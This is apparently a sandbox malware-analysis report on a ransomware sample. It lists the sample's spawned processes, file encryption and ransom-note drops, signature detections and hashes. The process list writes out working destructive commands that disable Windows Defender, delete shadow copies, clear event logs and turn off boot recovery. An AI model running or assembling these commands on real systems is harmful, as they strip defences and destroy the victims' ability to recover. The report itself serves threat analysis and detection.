| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe
"C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe"
C:\Windows\system32\net.exe
net.exe stop "NetMsmqActivator" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "NetMsmqActivator" /y
C:\Windows\system32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\system32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\system32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\system32\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\system32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\system32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\system32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\system32\sc.exe
sc.exe config "NetMsmqActivator" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\system32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\6pZZ_HOW_TO_DECRYPT.txt
C:\Windows\system32\notepad.exe
notepad.exe C:\6pZZ_HOW_TO_DECRYPT.txt
C:\Windows\system32\cmd.exe
cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe"
C:\Windows\system32\PING.EXE
ping.exe -n 5 127.0.0.1
Network
Files
memory/1544-54-0x0000000000000000-mapping.dmp
memory/756-55-0x0000000000000000-mapping.dmp
memory/524-56-0x0000000000000000-mapping.dmp
memory/1312-57-0x0000000000000000-mapping.dmp
memory/276-58-0x0000000000000000-mapping.dmp
memory/1832-59-0x0000000000000000-mapping.dmp
memory/1748-60-0x0000000000000000-mapping.dmp
memory/1272-61-0x0000000000000000-mapping.dmp
memory/616-62-0x0000000000000000-mapping.dmp
memory/864-63-0x0000000000000000-mapping.dmp
memory/432-64-0x0000000000000000-mapping.dmp
memory/1972-65-0x0000000000000000-mapping.dmp
memory/1968-66-0x0000000000000000-mapping.dmp
memory/1356-67-0x0000000000000000-mapping.dmp
memory/1492-68-0x0000000000000000-mapping.dmp
memory/1616-69-0x0000000000000000-mapping.dmp
memory/1652-70-0x0000000000000000-mapping.dmp
memory/1000-71-0x0000000000000000-mapping.dmp
memory/1468-72-0x0000000000000000-mapping.dmp
memory/1580-73-0x0000000000000000-mapping.dmp
memory/1484-74-0x0000000000000000-mapping.dmp
memory/1200-75-0x0000000000000000-mapping.dmp
memory/1904-76-0x0000000000000000-mapping.dmp
memory/588-77-0x0000000000000000-mapping.dmp
memory/904-78-0x0000000000000000-mapping.dmp
memory/1476-79-0x0000000000000000-mapping.dmp
memory/1732-80-0x0000000000000000-mapping.dmp
memory/1648-81-0x0000000000000000-mapping.dmp
memory/556-82-0x0000000000000000-mapping.dmp
memory/564-83-0x0000000000000000-mapping.dmp
memory/1320-84-0x0000000000000000-mapping.dmp
memory/1140-85-0x0000000000000000-mapping.dmp
memory/1032-86-0x0000000000000000-mapping.dmp
memory/1616-87-0x0000000000000000-mapping.dmp
memory/1636-88-0x0000000000000000-mapping.dmp
memory/1612-89-0x0000000000000000-mapping.dmp
memory/1628-90-0x0000000000000000-mapping.dmp
memory/1632-91-0x0000000000000000-mapping.dmp
memory/1388-92-0x0000000000000000-mapping.dmp
memory/816-93-0x0000000000000000-mapping.dmp
memory/1080-94-0x0000000000000000-mapping.dmp
memory/1512-95-0x0000000000000000-mapping.dmp
memory/268-96-0x0000000000000000-mapping.dmp
memory/1224-97-0x0000000000000000-mapping.dmp
memory/1168-98-0x0000000000000000-mapping.dmp
memory/2008-99-0x0000000000000000-mapping.dmp
memory/1164-100-0x0000000000000000-mapping.dmp
memory/1300-101-0x0000000000000000-mapping.dmp
memory/2024-102-0x0000000000000000-mapping.dmp
memory/1768-103-0x0000000000000000-mapping.dmp
memory/1192-104-0x0000000000000000-mapping.dmp
memory/1644-105-0x0000000000000000-mapping.dmp
memory/652-106-0x0000000000000000-mapping.dmp
memory/1256-107-0x0000000000000000-mapping.dmp
memory/864-108-0x0000000000000000-mapping.dmp
memory/1656-109-0x0000000000000000-mapping.dmp
memory/1672-110-0x0000000000000000-mapping.dmp
memory/1744-111-0x0000000000000000-mapping.dmp
memory/460-112-0x0000000000000000-mapping.dmp
memory/460-113-0x000007FEFBEE1000-0x000007FEFBEE3000-memory.dmp
memory/1640-114-0x0000000000000000-mapping.dmp
memory/1092-116-0x0000000000000000-mapping.dmp
memory/516-118-0x0000000000000000-mapping.dmp
memory/852-119-0x0000000000000000-mapping.dmp
memory/1056-120-0x0000000000000000-mapping.dmp
memory/2088-124-0x0000000002722000-0x0000000002724000-memory.dmp
memory/2088-125-0x0000000002724000-0x0000000002727000-memory.dmp
memory/2088-123-0x0000000002720000-0x0000000002722000-memory.dmp
memory/2088-122-0x000007FEF2FB0000-0x000007FEF3B0D000-memory.dmp
memory/2088-126-0x000000001B730000-0x000000001BA2F000-memory.dmp
memory/2088-127-0x000000000272B000-0x000000000274A000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | d88216012a722548d81c7ce0561235f9 |
| SHA1 | ee5bc440014e369227a5efd0de9d21b85f295a89 |
| SHA256 | 393f05206459e967b5f1be5180c6b5f0b0393c4eacfce8c394a71ca3d6bdf4e8 |
| SHA512 | c6ad11a28be7faf73f7bbd571ac64eec5124b7f47a0e9e456a60392c5ab5a2e45a7e63a4f78e6d6d74a0b5c87ef77aaefc5059a1705c12d1e32789d6326b6740 |
memory/2184-130-0x000007FEF2610000-0x000007FEF316D000-memory.dmp
memory/2184-131-0x0000000002AD0000-0x0000000002AD2000-memory.dmp
memory/2184-133-0x0000000002AD4000-0x0000000002AD7000-memory.dmp
memory/2184-132-0x0000000002AD2000-0x0000000002AD4000-memory.dmp
memory/2184-134-0x000000001B8D0000-0x000000001BBCF000-memory.dmp
memory/2184-135-0x0000000002ADB000-0x0000000002AFA000-memory.dmp
C:\Users\Admin\Desktop\6pZZ_HOW_TO_DECRYPT.txt
| MD5 | 1cfb0c836a5680f52b2d16a8ae40022e |
| SHA1 | da36a74002f1290477adfda81ff811c60707532a |
| SHA256 | 7fd073b91d1b56983dc0ef3937f75e7494840ae5d37027a76cfd04b04178e941 |
| SHA512 | efc87468cb3bff82d8f505c376a393a7b9c1abc517d771deae2855de9ead458fc37ca4bbfaed0f0b2840bba25ae3cd3d805f0bee464c64b774aa37ce913a4434 |
C:\6pZZ_HOW_TO_DECRYPT.txt
| MD5 | 1cfb0c836a5680f52b2d16a8ae40022e |
| SHA1 | da36a74002f1290477adfda81ff811c60707532a |
| SHA256 | 7fd073b91d1b56983dc0ef3937f75e7494840ae5d37027a76cfd04b04178e941 |
| SHA512 | efc87468cb3bff82d8f505c376a393a7b9c1abc517d771deae2855de9ead458fc37ca4bbfaed0f0b2840bba25ae3cd3d805f0bee464c64b774aa37ce913a4434 |
Analysis: behavioral2
Detonation Overview
Submitted
2022-01-13 10:14
Reported
2022-01-13 10:20
Platform
win10-en-20211208
Max time kernel
149s
Max time network
128s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Hive
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\SYSTEM32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Microsoft Office\root\Office16\MSIPC\6pZZ_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\7260_32x32x32.png | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.targetsize-32_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\xboxservices.config | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\MondoR_ConsumerSub_Bypass30-ppd.xrm-ms.el0PueNr8-qBMaf7BDnyErcFVkdtt4mWmo12YshKy2T_GN4KSAVDUb80.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-24_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\msadc\fr-FR\msdaremr.dll.mui.el0PueNr8-qBMaf7BDnyErcFVkdtt4mWmo12YshKy2T_VRijLTd8mkg0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsStore_11701.1001.87.0_neutral_split.scale-100_8wekyb3d8bbwe\resources.pri | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ru-ru\ui-strings.js.el0PueNr8-qBMaf7BDnyErcFVkdtt4mWmo12YshKy2T_1KhevmjJ2Cw0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ja-jp\ui-strings.js.el0PueNr8-qBMaf7BDnyErcFVkdtt4mWmo12YshKy2T_x4kWlYVbM8Y0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.XboxSpeechToTextOverlay_1.14.2002.0_neutral_split.scale-100_8wekyb3d8bbwe\AppxManifest.xml | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProjectProDemoR_BypassTrial180-ppd.xrm-ms.el0PueNr8-qBMaf7BDnyErcFVkdtt4mWmo12YshKy2T_Yv_w5yn9BBM0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Awards\tripeaks\Peak_Jumper_.png | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_2017.203.236.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui_3.106.0.v20140812-1751.jar.el0PueNr8-qBMaf7BDnyErcFVkdtt4mWmo12YshKy2T_NhiE4JNQSdI0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\7656_20x20x32.png | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\ado\msado60.tlb | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\ja-JP\wab32res.dll.mui | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7zCon.sfx.el0PueNr8-qBMaf7BDnyErcFVkdtt4mWmo12YshKy2T_R3aUOhDI0hA0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Corbel.xml.el0PueNr8-qBMaf7BDnyErcFVkdtt4mWmo12YshKy2T_9O24sbH-ny40.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\warning_2x.png.el0PueNr8-qBMaf7BDnyErcFVkdtt4mWmo12YshKy2T_MIrPGEwIn5E0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\hr-hr\6pZZ_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\OutlookVL_KMS_Client-ul-oob.xrm-ms.el0PueNr8-qBMaf7BDnyErcFVkdtt4mWmo12YshKy2T_JAGtPzF3KeA0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsSoundRecorder_10.1702.301.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\VoiceRecorderLargeTile.contrast-white_scale-125.png | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\4613_32x32x32.png | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\GenericMailBadge.scale-200.png | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\Close2x.png.el0PueNr8-qBMaf7BDnyErcFVkdtt4mWmo12YshKy2T_lk4qZs6Ih480.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\sv-se\ui-strings.js.el0PueNr8-qBMaf7BDnyErcFVkdtt4mWmo12YshKy2T_LtvdhNbC9gg0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\es-es\6pZZ_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_neutral_split.scale-180_8wekyb3d8bbwe\Assets\Office\NewScene.scale-180.png | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\Office\BooleanIntersect.scale-100.png | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe\Assets\GetStartedSmallTile.scale-100_contrast-black.png | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\small\yes.png | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\io_60x42.png | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\css\main-selector.css.el0PueNr8-qBMaf7BDnyErcFVkdtt4mWmo12YshKy2T_UdAIZ4TUuU80.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\Ole DB\ja-JP\msdasqlr.dll.mui.el0PueNr8-qBMaf7BDnyErcFVkdtt4mWmo12YshKy2T_uiCzWVthXMc0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\tr-tr\6pZZ_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Sticker_Kiss.png | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_1.4.101.0_x64__8wekyb3d8bbwe\Assets\LockScreenLogo.scale-200.png | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\6440_48x48x32.png | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\VBA\VBA7.1\1033\VBLR6.CHM.el0PueNr8-qBMaf7BDnyErcFVkdtt4mWmo12YshKy2T_1KE3OVPgM5Q0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
